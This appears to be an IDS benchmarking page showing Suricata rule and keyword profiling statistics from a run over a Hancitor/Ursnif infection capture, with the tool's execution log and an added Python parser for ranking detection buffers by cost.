  47       2828986      1        2        1620462      0.36   50       0        85130       32409.24    0.00        32409.24   
  48       2819978      1        5        1548771      0.34   25       25       85110       61950.84    61950.84    0.00       
  49       2014703      1        9        13481468     3.00   1436     0        84928       9388.21     0.00        9388.21    
  50       2830425      1        1        636412       0.14   13       0        84639       48954.77    0.00        48954.77   
  51       2811399      1        2        482335       0.11   12       0        83974       40194.58    0.00        40194.58   
  52       2021248      1        7        86930        0.02   2        0        83664       43465.00    0.00        43465.00   
  53       2803000      1        2        82043        0.02   1        0        82043       82043.00    0.00        82043.00   
  54       2815659      1        3        526969       0.12   12       12       78853       43914.08    43914.08    0.00       
  55       2022901      1        2        1192616      0.27   27       0        78015       44170.96    0.00        44170.96   
  56       2020181      1        8        1002001      0.22   27       0        77510       37111.15    0.00        37111.15   
  57       2826281      1        2        11552921     2.57   810      0        76484       14262.87    0.00        14262.87   
  58       2018316      1        4        14407601     3.21   445      0        75757       32376.63    0.00        32376.63   
  59       2807970      1        8        1171805      0.26   27       0        75331       43400.19    0.00        43400.19   
  60       2020855      1        3        2417817      0.54   53       0        74996       45619.19    0.00        45619.19   
  61       2020741      1        1        13909208     3.10   445      0        74961       31256.65    0.00        31256.65   
  62       2816910      1        2        2952364      0.66   55       0        73732       53679.35    0.00        53679.35   
  63       2809363      1        3        1154074      0.26   27       0        73185       42743.48    0.00        42743.48   
  64       2020742      1        1        13748650     3.06   445      0        72885       30895.84    0.00        30895.84   
  65       2816925      1        3        1711851      0.38   55       0        72270       31124.56    0.00        31124.56   
  66       2816526      1        13       1542252      0.34   55       0        68146       28040.95    0.00        28040.95   
  67       2017261      1        3        1133081      0.25   27       0        67809       41965.96    0.00        41965.96   
  68       2819993      1        2        1207666      0.27   25       0        67382       48306.64    0.00        48306.64   
  69       2019094      1        5        1198287      0.27   29       0        67304       41320.24    0.00        41320.24   
  70       2820851      1        5        2082239      0.46   55       0        66970       37858.89    0.00        37858.89   
  71       2809850      1        2        6334244      1.41   302      0        66413       20974.32    0.00        20974.32   
  72       2017259      1        12       1291326      0.29   25       0        65133       51653.04    0.00        51653.04   
  73       2022545      1        1        2176126      0.48   147      0        63939       14803.58    0.00        14803.58   
  74       2815254      1        7        1013946      0.23   22       0        63096       46088.45    0.00        46088.45   
  75       2802991      1        5        300187       0.07   6        0        62873       50031.17    0.00        50031.17   
  76       2828060      1        4        1554952      0.35   51       0        62845       30489.25    0.00        30489.25   
  77       2816930      1        4        1619932      0.36   55       0        62521       29453.31    0.00        29453.31   
  78       2810991      1        4        1238649      0.28   25       0        62272       49545.96    0.00        49545.96   
  79       2803760      1        3        11944799     2.66   810      0        61933       14746.67    0.00        14746.67   
  80       2812141      1        2        762974       0.17   25       0        61783       30518.96    0.00        30518.96   
  81       2810607      1        8        894200       0.20   22       0        61213       40645.45    0.00        40645.45   
  82       2821569      1        7        987971       0.22   27       0        60985       36591.52    0.00        36591.52   
  83       2008120      1        4        4177484      0.93   1436     0        60839       2909.11     0.00        2909.11    
  84       2812433      1        2        1029739      0.23   27       0        60198       38138.48    0.00        38138.48   
  85       2815477      1        6        286234       0.06   7        0        59790       40890.57    0.00        40890.57   
  86       2804626      1        9        1215166      0.27   55       0        59670       22093.93    0.00        22093.93   
  87       2811544      1        1        665947       0.15   46       0        59228       14477.11    0.00        14477.11   
  88       2801861      1        1        87648        0.02   2        0        58966       43824.00    0.00        43824.00   
  89       2014411      1        11       116808       0.03   2        2        58745       58404.00    58404.00    0.00       
  90       2024606      1        2        616870       0.14   27       0        58653       22847.04    0.00        22847.04   
  91       2017552      1        6        4786349      1.07   312      0        57502       15340.86    0.00        15340.86   
  92       2816924      1        4        1548970      0.34   55       0        57474       28163.09    0.00        28163.09   
  93       2021038      1        4        773921       0.17   25       0        57345       30956.84    0.00        30956.84   
  94       2819673      1        4        1632633      0.36   55       0        56918       29684.24    0.00        29684.24   
  95       2025064      1        5        2154923      0.48   55       0        56913       39180.42    0.00        39180.42   
  96       2816927      1        3        1880535      0.42   55       0        56812       34191.55    0.00        34191.55   
  97       2824971      1        3        107769       0.02   2        0        56807       53884.50    0.00        53884.50   
  98       2829848      1        2        1464961      0.33   50       0        56733       29299.22    0.00        29299.22   
  99       2014967      1        3        646848       0.14   27       0        56595       23957.33    0.00        23957.33   
  100      2815886      1        2        1079776      0.24   40       0        56513       26994.40    0.00        26994.40   
  101      2809511      1        4        965805       0.22   27       0        56388       35770.56    0.00        35770.56   
  102      2010142      1        4        2670325      0.59   957      0        55708       2790.31     0.00        2790.31    
  103      2014701      1        12       18241070     4.06   1436     0        55210       12702.69    0.00        12702.69   
  104      2816768      1        2        818808       0.18   25       0        54937       32752.32    0.00        32752.32   
  105      2816931      1        3        1550311      0.35   55       0        54669       28187.47    0.00        28187.47   
  106      2010143      1        3        3610415      0.80   957      0        53962       3772.64     0.00        3772.64    
  107      2812337      1        3        450367       0.10   53       0        53822       8497.49     0.00        8497.49    
  108      2819790      1        3        89179        0.02   2        0        53588       44589.50    0.00        44589.50   
  109      2816895      1        2        53583        0.01   1        0        53583       53583.00    0.00        53583.00   
  110      2822979      1        3        53424        0.01   1        0        53424       53424.00    0.00        53424.00   
  111      2826156      1        2        700247       0.16   32       0        53407       21882.72    0.00        21882.72   
  112      2802822      1        1        1667478      0.37   573      0        53336       2910.08     0.00        2910.08    
  113      2816356      1        2        1936152      0.43   48       0        52936       40336.50    0.00        40336.50   
  114      2025086      1        6        52868        0.01   1        1        52868       52868.00    52868.00    0.00       
  115      2816928      1        3        1839571      0.41   55       0        52821       33446.75    0.00        33446.75   
  116      2816525      1        10       1855497      0.41   55       0        52805       33736.31    0.00        33736.31   
  117      2809859      1        6        1309837      0.29   47       0        52579       27868.87    0.00        27868.87   
  118      2015877      1        6        864343       0.19   27       0        52195       32012.70    0.00        32012.70   
  119      2821561      1        2        1379637      0.31   47       0        52134       29353.98    0.00        29353.98   
  120      2024573      1        2        595998       0.13   25       0        51722       23839.92    0.00        23839.92   
  121      2021413      1        2        969555       0.22   27       0        51655       35909.44    0.00        35909.44   
  122      2816669      1        4        1061837      0.24   47       0        51628       22592.28    0.00        22592.28   
  123      2815817      1        5        1603112      0.36   55       0        51598       29147.49    0.00        29147.49   
  124      2815363      1        3        909112       0.20   25       0        51521       36364.48    0.00        36364.48   
  125      2820919      1        2        5

This file has been truncated.


unified2.alert.1548933118 - (51136 bytes)

This file has been truncated.


keyword_perf.log - (14931 bytes)
  --------------------------------------------------------------------------------------------------------------------------------
  Date: 1/31/2019 -- 11:12:00
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: total
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             17793329        5601            5601            57345           3176.00         3176.00         0.00           
  content          102283449       19053           12828           17049374        5368.00         4281.00         7609.00        
  pcre             17688207        4953            836             384688          3571.00         4312.00         3420.00        
  byte_test        25191043        8907            6316            71749           2828.00         2846.00         2784.00        
  isdataat         2570046         921             0               21804           2790.00         0.00            2790.00        
  flowbits         2041046         715             59              27593           2854.00         3785.00         2770.00        
  urilen           3849779         1179            324             96066           3265.00         3224.00         3280.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             17793329        5601            5601            57345           3176.00         3176.00         0.00           
  flowbits         1934792         694             38              15083           2787.00         3081.00         2770.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet/stream payload
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          35298962        11058           7715            440031          3192.00         3118.00         3362.00        
  pcre             4663872         1333            302             53580           3498.00         3472.00         3506.00        
  byte_test        25191043        8907            6316            71749           2828.00         2846.00         2784.00        
  isdataat         2567241         920             0               21804           2790.00         0.00            2790.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: post-match
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flowbits         106254          21              21              27593           5059.00         5059.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_uri
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          5104375         1339            876             44436           3812.00         3837.00         3764.00        
  pcre             3167986         690             212             72613           4591.00         4886.00         4460.00        
  isdataat         2805            1               0               2805            2805.00         0.00            2805.00        
  urilen           3849779         1179            324             96066           3265.00         3224.00         3280.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_client_body
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          1577161         431             125             18422           3659.00         3445.00         3746.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_response_line
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          142522          41              0               18268           3476.00         0.00            3476.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: file_data
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          39924014        920             317             17049374        43395.00        38958.00        45728.00       
  pcre             7024934         2326            0               384688          3020.00         0.00            3020.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          14286311        3678            2684            31817           3884.00         3921.00         3783.00        
  pcre             2095684         438             190             21834           4784.00         5091.00         4549.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header_names
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          1617099         454             301             20979           3561.00         3518.00         3648.00        
  pcre             107983          27              22              12706           3999.00         3514.00         6130.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_accept
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          26245           9               0               3174            2916.00         0.00            2916.00        
  pcre             122146          25              0               16836           4885.00         0.00            4885.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_content_type
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          446654          127             125             17518           3516.00         3510.00         3934.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_protocol
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          14594           4               4               3937            3648.00         3648.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_method
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          2081859         526             456             87435           3957.00         3820.00         4853.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_user_agent
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          1366987         348             197             86495           3928.00         4217.00         3551.00        
  pcre             475706          110             110             17164           4324.00         4324.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_host
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          21478           5               5               4728            4295.00         4295.00         0.00           
  pcre             29896           4               0               16667           7474.00         0.00            7474.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_stat_code
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          352173          108             18              4759            3260.00         3426.00         3227.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: dns_query
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          23015           5               5               5104            4603.00         4603.00         0.00           
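
The tables above are Suricata's per-buffer keyword profiling output (one "Stats for:" block per sticky buffer, one row per keyword). They are easier to reason about once parsed: total ticks per buffer show where detection time goes, and a buffer where pcre is checked more often than content (http_accept above: 25 pcre checks against 9 content checks) suggests rules whose regex is not narrowed by a content prefilter on that buffer. The parser below is an added example, not part of the IDSDeathBlossom output or of Suricata; the sample input is copied from the http_accept, http_host and dns_query tables above, and the "pcre heavier than content" test is a heuristic of this example, not a Suricata rule.

```python
"""Parse Suricata keyword-profiling tables and rank sticky buffers by cost.

Added example; the SAMPLE text is copied from the profiling dump on this page.
"""
import re
from typing import Dict, List, Tuple

# Constructed sample: three of the "Stats for:" blocks from the dump above.
SAMPLE = """\
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_accept
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          26245           9               0               3174            2916.00         0.00            2916.00        
  pcre             122146          25              0               16836           4885.00         0.00            4885.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_host
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          21478           5               5               4728            4295.00         4295.00         0.00           
  pcre             29896           4               0               16667           7474.00         0.00            7474.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: dns_query
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          23015           5               5               5104            4603.00         4603.00         0.00           
"""

SECTION_RE = re.compile(r"^\s*Stats for:\s*(\S+)\s*$")
# One data row: keyword, four integer columns, three decimal columns.
ROW_RE = re.compile(
    r"^\s*(?P<kw>[A-Za-z_]\w*)\s+(?P<ticks>\d+)\s+(?P<checks>\d+)\s+(?P<matches>\d+)"
    r"\s+(?P<max_ticks>\d+)\s+(?P<avg>[\d.]+)\s+(?P<avg_match>[\d.]+)\s+(?P<avg_nomatch>[\d.]+)\s*$"
)

Profile = Dict[str, Dict[str, Dict[str, float]]]


def parse_keyword_profile(text: str) -> Profile:
    """Return {buffer: {keyword: {ticks, checks, matches, max_ticks, avg, ...}}}."""
    profile: Profile = {}
    current = None
    for line in text.splitlines():
        sec = SECTION_RE.match(line)
        if sec:
            current = sec.group(1)
            profile[current] = {}
            continue
        row = ROW_RE.match(line)
        if row and current is not None:  # header and dash lines never match ROW_RE
            cols = row.groupdict()
            kw = cols.pop("kw")
            profile[current][kw] = {
                k: (float(v) if "." in v else int(v)) for k, v in cols.items()
            }
    return profile


def rank_buffers_by_ticks(profile: Profile) -> List[Tuple[str, int]]:
    """Buffers ordered by total ticks spent across all keywords, most expensive first."""
    totals = [(buf, sum(int(r["ticks"]) for r in rows.values())) for buf, rows in profile.items()]
    return sorted(totals, key=lambda t: t[1], reverse=True)


def pcre_heavier_than_content(profile: Profile) -> List[str]:
    """Heuristic (this example's assumption, not a Suricata rule): a buffer where pcre
    is evaluated more often than content hints at regexes running without a content
    prefilter on that buffer, which is the usual cause of expensive no-match pcre checks."""
    flagged = []
    for buf, rows in profile.items():
        pcre_checks = rows.get("pcre", {}).get("checks", 0)
        content_checks = rows.get("content", {}).get("checks", 0)
        if pcre_checks > content_checks:
            flagged.append(buf)
    return flagged


def match_rate(profile: Profile, buf: str, kw: str) -> float:
    """Fraction of checks that matched; 0.0 when the keyword was never checked."""
    row = profile[buf][kw]
    return row["matches"] / row["checks"] if row["checks"] else 0.0


if __name__ == "__main__":
    prof = parse_keyword_profile(SAMPLE)
    for buf, ticks in rank_buffers_by_ticks(prof):
        print(f"{buf:<20} {ticks:>10} ticks")
    print("pcre checked more often than content on:", pcre_heavier_than_content(prof))
```

Run it against the full stats file rather than the embedded sample to rank every buffer on the page; a high-tick buffer with a low match rate is the place to look for rules that need a tighter content anchor before their pcre.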


IDSDeathBlossom.py.log - (1189 bytes) - download
2019-01-31 11:11:38,490 - INFO - __init__ - /opt/IDSDeathBlossom/IDSDeathBlossom.py +38 - DBType: MYSQL
2019-01-31 11:11:39,192 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +247 - Runmode set to run
2019-01-31 11:11:39,193 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +248 - Targets set to suricata-4.0.0-etpro-all
2019-01-31 11:11:39,193 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +320 - looping 1 times in runmode run
2019-01-31 11:11:39,193 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +330 - run with success 0 out of 1
2019-01-31 11:11:39,193 - INFO - execute - /opt/IDSDeathBlossom/IDSDeathBlossom.py +207 - Executing: /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/2280b037326fec8a762c9a1b32aae0ca56b33745cb75ec8c950e11a498e082d2 -r /var/pcap/01312019.1111-2019-01-16-Hancitor-infection-traffic-with-Ursnif.pcap -vvv -k none
2019-01-31 11:12:00,259 - INFO - run_ids - /opt/IDSDeathBlossom/IDSDeathBlossom.py +244 - suricata ran successfully
2019-01-31 11:12:00,260 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +275 - Total time for the idstool 21.7817521095